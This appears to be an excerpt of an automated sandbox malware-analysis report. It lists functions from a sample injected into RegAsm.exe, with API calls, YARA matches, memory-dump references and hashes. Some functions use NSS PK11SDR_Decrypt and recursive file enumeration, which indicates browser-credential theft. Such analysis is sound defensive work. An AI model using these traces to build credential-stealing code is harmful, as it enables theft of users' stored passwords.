                                                                                • Opcode Fuzzy Hash: f57dbc4b3c42bfcb8d2e40b16b3aac21894dd785c7ae38fd2cd95bc549fe5d80
                                                                                • Instruction Fuzzy Hash: 9E027D70904248EACB15EBE5C856BDEBB78AF19304F4040BEE509B35C2DB785B4DCB66
                                                                                Function 6C7DD4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(6C83E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C7ED1C5), ref: 6C7DD4F2
                                                                                • LeaveCriticalSection.KERNEL32(6C83E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C7ED1C5), ref: 6C7DD50B
                                                                                  • Part of subcall function 6C7BCFE0: EnterCriticalSection.KERNEL32(6C83E784), ref: 6C7BCFF6
                                                                                  • Part of subcall function 6C7BCFE0: LeaveCriticalSection.KERNEL32(6C83E784), ref: 6C7BD026
                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C7ED1C5), ref: 6C7DD52E
                                                                                • EnterCriticalSection.KERNEL32(6C83E7DC), ref: 6C7DD690
                                                                                • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C7DD6A6
                                                                                • LeaveCriticalSection.KERNEL32(6C83E7DC), ref: 6C7DD712
                                                                                • LeaveCriticalSection.KERNEL32(6C83E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C7ED1C5), ref: 6C7DD751
                                                                                • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C7DD7EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                • API String ID: 2690322072-3894294050
                                                                                • Opcode ID: fc2ab11335203211ea8fc1eea767a9dad6e31eb9df8c4fe0bcddd1c4f2d9940f
                                                                                • Instruction ID: b18b44d365d3aecb922f0c73c1f4c490bac24ca5411fd836bc80b1c1bcb180d5
                                                                                • Opcode Fuzzy Hash: fc2ab11335203211ea8fc1eea767a9dad6e31eb9df8c4fe0bcddd1c4f2d9940f
                                                                                • Instruction Fuzzy Hash: AF91D271A047018FD724CF78C69472AB7E1EB99318F16993EE49A87A81D730A844CFA5
                                                                                Function 6C900EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PK11_PubDeriveWithKDF.NSS3 ref: 6C900F8D
                                                                                • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C900FB3
                                                                                • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C901006
                                                                                • PK11_FreeSymKey.NSS3(?), ref: 6C90101C
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C901033
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C90103F
                                                                                • PK11_FreeSymKey.NSS3(00000000), ref: 6C901048
                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6C90108E
                                                                                • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C9010BB
                                                                                • memcpy.VCRUNTIME140(?,00000006,?), ref: 6C9010D6
                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6C90112E
                                                                                  • Part of subcall function 6C901570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C9008C4,?,?), ref: 6C9015B8
                                                                                  • Part of subcall function 6C901570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C9008C4,?,?), ref: 6C9015C1
                                                                                  • Part of subcall function 6C901570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C90162E
                                                                                  • Part of subcall function 6C901570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C901637
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
                                                                                • String ID:
                                                                                • API String ID: 1510409361-0
                                                                                • Opcode ID: f3d100510ffff74cf9cc8c11469e317e12e2d5eeffd1af58ba2e2ea685fbb4f9
                                                                                • Instruction ID: f12ad2c53cc2b9f39c6a2dd4f32ed78e14f34ffd3c7359f5898b99befcb1244d
                                                                                • Opcode Fuzzy Hash: f3d100510ffff74cf9cc8c11469e317e12e2d5eeffd1af58ba2e2ea685fbb4f9
                                                                                • Instruction Fuzzy Hash: 5F71EFB5A04205CFDB04CFA9DC81A6AB7B8FF5A31CF14862CE95997B11E731D954CB80
                                                                                Function 6C926C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C8D1C6F,00000000,00000004,?,?), ref: 6C926C3F
                                                                                  • Part of subcall function 6C97C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C97C2BF
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C8D1C6F,00000000,00000004,?,?), ref: 6C926C60
                                                                                • PR_ExplodeTime.NSS3(00000000,6C8D1C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C8D1C6F,00000000,00000004,?,?), ref: 6C926C94
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                • API String ID: 3534712800-180463219
                                                                                • Opcode ID: b106b1d196c7bbef90e3e8980b1ab7eba61b390a01748c34a1e539d5e4c7c324
                                                                                • Instruction ID: 740a9779eb1216a1facd72d9962d7b1f6cc8ff0a2f1a30f22de38f570e04679d
                                                                                • Opcode Fuzzy Hash: b106b1d196c7bbef90e3e8980b1ab7eba61b390a01748c34a1e539d5e4c7c324
                                                                                • Instruction Fuzzy Hash: 96516A72B116494FC718CDADDC526DABBDAABA4310F48C23AE842CBB85D638D906C751
                                                                                Function 004082DE Relevance: 15.1, APIs: 10, Instructions: 83stringencryptionCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00408305
                                                                                • lstrlenA.KERNEL32(0040860A,00000001,?,00000014,00000000,00000000,?,0040860A,00000014), ref: 0040831F
                                                                                • CryptStringToBinaryA.CRYPT32(0040860A,00000000,?,0040860A,00000014), ref: 00408329
                                                                                • PK11_GetInternalKeySlot.NSS3(?,0040860A,00000014), ref: 00408337
                                                                                • PK11_Authenticate.NSS3(00000000,00000001,00000000,?,0040860A,00000014), ref: 0040834C
                                                                                • PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 00408377
                                                                                • memcpy.MSVCRT ref: 00408391
                                                                                • lstrcat.KERNEL32(00425BDF,00425BE3), ref: 004083B8
                                                                                • PK11_FreeSlot.NSS3(?), ref: 004083C1
                                                                                • lstrcat.KERNEL32(00425BDF,00425BE6), ref: 004083D0
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: K11_$Slotlstrcat$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlenmemcpymemset
                                                                                • String ID:
                                                                                • API String ID: 2251291257-0
                                                                                • Opcode ID: 0d194773312f30509f7fa6cf098b79dbf7b5062e3d3c24c3d5d924c9773e7279
                                                                                • Instruction ID: ccf38daf680dc84ecda820ff8efca09b4dd81ade2d3244571ab64e279443b136
                                                                                • Opcode Fuzzy Hash: 0d194773312f30509f7fa6cf098b79dbf7b5062e3d3c24c3d5d924c9773e7279
                                                                                • Instruction Fuzzy Hash: B6217AB190011DEFCB109FA4ED45AEE7BBCFB08744F10047AFA05F2250EB359A459BA5
                                                                                Function 00409900 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 441fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00409905
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00425BFE,00000000,74E1AC90), ref: 00409964
                                                                                • StrCmpCA.SHLWAPI(?,00425E34), ref: 00409981
                                                                                • StrCmpCA.SHLWAPI(?,00425E38), ref: 0040999B
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                  • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                  • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                  • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                  • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                  • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                  • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                  • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                  • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 00409F07
                                                                                • FindClose.KERNEL32(00000000), ref: 00409F16
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$Filelstrcpy$Find$CloseCreatelstrcat$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
                                                                                • String ID: "$\*.*
                                                                                • API String ID: 1275501236-2874818444
                                                                                • Opcode ID: 16a805665bae22964cdcc0cb8db4054f42bd3802ec23f9b7888e1a7f694673ba
                                                                                • Instruction ID: 1d715896bfc6fee1c5425f8939d85c219fb8e95ba328030b9625facc8afd5315
                                                                                • Opcode Fuzzy Hash: 16a805665bae22964cdcc0cb8db4054f42bd3802ec23f9b7888e1a7f694673ba
                                                                                • Instruction Fuzzy Hash: E7124B71904149EACB15EBE5C956BEEBB78AF18308F5041BAE409735C2DF381B8CCB65
                                                                                Function 6C9A8FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9A8FEE
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9A90DC
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9A9118
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9A915C
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9A91C2
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9A9209
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: 3333$UUUU
                                                                                • API String ID: 1967222509-2679824526
                                                                                • Opcode ID: cc135d80653097f20f2893939d2c6e8296d0ef3659e92a21f63808cf93ce423a
                                                                                • Instruction ID: b47a58a7a07aa3f3ceadc43aada42c0e04ba329c6ad4956dd842128b33347398
                                                                                • Opcode Fuzzy Hash: cc135d80653097f20f2893939d2c6e8296d0ef3659e92a21f63808cf93ce423a
                                                                                • Instruction Fuzzy Hash: 38A1A272E001259BDB08CBA9CC90BAEB7B5BF49328F1A4135D905A7741D73AEC42CBD0
                                                                                Function 6C860FE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 227COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6C85CA30: EnterCriticalSection.KERNEL32(?,?,?,6C8BF9C9,?,6C8BF4DA,6C8BF9C9,?,?,6C88369A), ref: 6C85CA7A
                                                                                  • Part of subcall function 6C85CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C85CB26
                                                                                • memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C86103E
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6C861139
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 6C861190
                                                                                • sqlite3_free.NSS3(00000000), ref: 6C861227
                                                                                • sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C86126E
                                                                                • sqlite3_free.NSS3(?), ref: 6C86127F
                                                                                Strings
                                                                                • winAccess, xrefs: 6C86129B
                                                                                • delayed %dms for lock/sharing conflict at line %d, xrefs: 6C861267
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
                                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
                                                                                • API String ID: 2733752649-1873940834
                                                                                • Opcode ID: 3c7355459d502c871810573f56485e5715855988dce28afbba7ba47d51e1c973
                                                                                • Instruction ID: faa7c154aed2bcaa54ae93f6477f40894613b8a1b048dda6f7da027128ed41c4
                                                                                • Opcode Fuzzy Hash: 3c7355459d502c871810573f56485e5715855988dce28afbba7ba47d51e1c973
                                                                                • Instruction Fuzzy Hash: 02716B317043129BEB28CF36DE55A6A7775FB47314F084A28E916C7E81DB38D842C792
                                                                                Function 6C86AEC0 Relevance: 13.7, APIs: 9, Instructions: 242COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,?,00000002,?,6C98CF46,?,6C85CDBD,?,6C98BF31,?,?,?,?,?,?,?), ref: 6C86B039
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C98CF46,?,6C85CDBD,?,6C98BF31), ref: 6C86B090
                                                                                • sqlite3_free.NSS3(?,?,?,?,?,?,6C98CF46,?,6C85CDBD,?,6C98BF31), ref: 6C86B0A2
                                                                                • CloseHandle.KERNEL32(?,?,6C98CF46,?,6C85CDBD,?,6C98BF31,?,?,?,?,?,?,?,?,?), ref: 6C86B100
                                                                                • sqlite3_free.NSS3(?,?,00000002,?,6C98CF46,?,6C85CDBD,?,6C98BF31,?,?,?,?,?,?,?), ref: 6C86B115
                                                                                • sqlite3_free.NSS3(?,?,?,?,?,?,6C98CF46,?,6C85CDBD,?,6C98BF31), ref: 6C86B12D
                                                                                  • Part of subcall function 6C859EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C86C6FD,?,?,?,?,6C8BF965,00000000), ref: 6C859F0E
                                                                                  • Part of subcall function 6C859EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C8BF965,00000000), ref: 6C859F5D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
                                                                                • String ID:
                                                                                • API String ID: 3155957115-0
                                                                                • Opcode ID: 52c9e532ecc2c9b95332501746370909a19725b8365a64f34fc4a4dafecc9dc8
                                                                                • Instruction ID: c7a8a74a2af6ab6d1f02363211a2bfde6ff09a141a5df4ab3dcba4af98a1cc54
                                                                                • Opcode Fuzzy Hash: 52c9e532ecc2c9b95332501746370909a19725b8365a64f34fc4a4dafecc9dc8
                                                                                • Instruction Fuzzy Hash: A491C3B0A043168FDB24CF2ADA84BBBB7B1FF45308F184A2DE41697A50EB35E441CB51
                                                                                Function 6C9E8D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_CallOnce.NSS3(6CA314E4,6C99CC70), ref: 6C9E8D47
                                                                                • PR_GetCurrentThread.NSS3 ref: 6C9E8D98
                                                                                  • Part of subcall function 6C8C0F00: PR_GetPageSize.NSS3(6C8C0936,FFFFE8AE,?,6C8516B7,00000000,?,6C8C0936,00000000,?,6C85204A), ref: 6C8C0F1B
                                                                                  • Part of subcall function 6C8C0F00: PR_NewLogModule.NSS3(clock,6C8C0936,FFFFE8AE,?,6C8516B7,00000000,?,6C8C0936,00000000,?,6C85204A), ref: 6C8C0F25
                                                                                • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C9E8E7B
                                                                                • htons.WSOCK32(?), ref: 6C9E8EDB
                                                                                • PR_GetCurrentThread.NSS3 ref: 6C9E8F99
                                                                                • PR_GetCurrentThread.NSS3 ref: 6C9E910A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                • String ID: %u.%u.%u.%u
                                                                                • API String ID: 1845059423-1542503432
                                                                                • Opcode ID: 7aaa6896c1691284bfd5fcda73992169fa91a93a70022b69f492175df937f0d2
                                                                                • Instruction ID: cc95938f2786bb5ea3f71c3c3a6f7f55fdc31cdf4324b38a2995173b41104631
                                                                                • Opcode Fuzzy Hash: 7aaa6896c1691284bfd5fcda73992169fa91a93a70022b69f492175df937f0d2
                                                                                • Instruction Fuzzy Hash: 8702CE319092518FDB1ACF19C4683A6BBB7EF6A308F1A825EC8915FBD1C331DA45C790
                                                                                Function 6C802C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C802C31
                                                                                • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C802C61
                                                                                  • Part of subcall function 6C7B4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C7B4E5A
                                                                                  • Part of subcall function 6C7B4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C7B4E97
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C802C82
                                                                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C802E2D
                                                                                  • Part of subcall function 6C7C81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C7C81DE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
